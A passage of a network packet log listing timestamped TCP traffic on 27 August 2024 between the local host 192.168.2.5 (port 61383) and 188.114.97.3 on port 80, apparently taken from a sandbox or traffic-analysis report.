                              Aug 27, 2024 09:48:55.729787111 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.729813099 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.729824066 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.729852915 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.729979038 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.729990005 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.730000019 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.730010033 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.730020046 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.730031013 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.730037928 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.730041981 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.730053902 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.730055094 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.730076075 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.730194092 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.730206013 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.730216026 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.730226994 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.730240107 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.730247021 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.730289936 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.745868921 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.746014118 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.746025085 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.746036053 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.746056080 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.746068001 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.746079922 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.746090889 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.746104956 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.746114016 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.746131897 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.746141911 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.746151924 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.746155977 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.746165991 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.746221066 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.746232033 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.746243000 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.746326923 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.746346951 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.746359110 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.746371984 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.746383905 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.746386051 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.746411085 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.746452093 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.746493101 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.746525049 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.746536970 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.746547937 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.746561050 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.746573925 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.746577024 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.746586084 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.746592999 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.746623993 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.746661901 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.746673107 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.746714115 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.746723890 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.746726036 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.746737957 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.746748924 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.746761084 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.746783972 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.746965885 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.746977091 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.746988058 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.746999979 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747015953 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747021914 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.747026920 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747036934 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.747037888 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747051001 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747064114 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747076988 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747090101 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.747111082 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.747250080 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747262001 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747272968 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747284889 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747298002 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747302055 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.747313976 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747322083 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.747327089 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747339964 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747353077 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747361898 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.747364998 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747379065 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.747411013 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.747555971 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747566938 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747577906 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747589111 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747601032 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747612953 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747618914 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.747623920 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747641087 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.747658014 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.747715950 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747728109 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747739077 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747750998 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747762918 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747769117 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.747781992 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.747801065 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.747859955 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747872114 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747881889 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747893095 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747904062 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747915030 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747920036 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.747927904 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747939110 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747946978 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.747951031 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747961998 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.747963905 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747973919 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747980118 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.747984886 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.747997046 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.748001099 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.748032093 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.748380899 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.748393059 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.748404026 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.748414993 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.748435974 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.748467922 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.755789042 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.755800009 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.755809069 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.755872011 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.755873919 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.755882978 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.755892992 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.755903959 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.755928040 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.755928993 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.755954981 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.797024965 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.818175077 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.818191051 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.818202019 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.818211079 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.818222046 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.818265915 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.818276882 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.818285942 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.818295956 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.818309069 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.818442106 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.818453074 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.818463087 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.818473101 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.818474054 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.818475008 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.818522930 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.818541050 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.818543911 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.818550110 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.818558931 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.818571091 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.818581104 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.818592072 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.818600893 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.818603039 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.818620920 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.818648100 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.818728924 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.818737984 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.818748951 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.818778038 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.818814993 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.818824053 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.818825960 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.818840027 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.818851948 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.818861961 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.818876028 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.818903923 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.818933964 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.819010019 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.834619999 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.834634066 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.834645033 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.834716082 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.834727049 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.834738016 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.834762096 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.834775925 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.834796906 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.834822893 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.834836006 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.834846973 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.834863901 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.834909916 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.835045099 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.835055113 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.835067034 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.835078955 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.835089922 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.835100889 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.835114002 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.835124016 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.835134983 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.835141897 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.835170984 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.835190058 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.835201979 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.835211992 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.835244894 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.835290909 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.835372925 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.835383892 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.835396051 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.835405111 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.835424900 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.835436106 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.835445881 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.835457087 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.835464001 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.835472107 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.835484982 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.835494995 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.835496902 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.835506916 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.835516930 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.835529089 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.835551977 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.835933924 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.835949898 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.835959911 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.835968971 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.835978985 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.835988998 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.835990906 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.836000919 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.836013079 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.836024046 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.836030006 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.836035013 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.836050034 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.836062908 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.836064100 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.836076021 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.836087942 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.836097956 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.836098909 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.836111069 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.836123943 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.836143017 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.836169958 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.836182117 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.836213112 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.836394072 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.836410046 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.836420059 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.836430073 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.836441040 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.836452007 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.836452961 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.836462975 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.836462975 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.836472988 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.836488008 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.836498976 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.836500883 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.836510897 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.836522102 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.836527109 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.836533070 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.836543083 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.836543083 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.836554050 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.836564064 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.836565018 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.836575031 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.836575985 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.836586952 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.836602926 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.836605072 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.836630106 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.836639881 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.836875916 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.836888075 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.836958885 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.836982965 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.836993933 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.837004900 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.837016106 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.837028027 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.837038994 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.837044001 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.837049007 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.837069035 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.837107897 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.844451904 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.844469070 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.844479084 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.844497919 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.844508886 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.844516993 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.844518900 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.844533920 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.844547033 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.844556093 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.844585896 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.906753063 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.906883955 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.906899929 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.906912088 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.906922102 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.906934023 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.906944036 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.906955004 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.907048941 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.907048941 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.907048941 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.907058954 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.907068968 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.907078028 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.907088041 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.907100916 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.907110929 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.907120943 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.907149076 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.907188892 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.907210112 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.907221079 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.907232046 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.907243013 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.907253981 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.907258034 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.907305002 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.907318115 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:55.907377005 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:55.907388926 CEST8061383188.114.97.3192.168.2.5
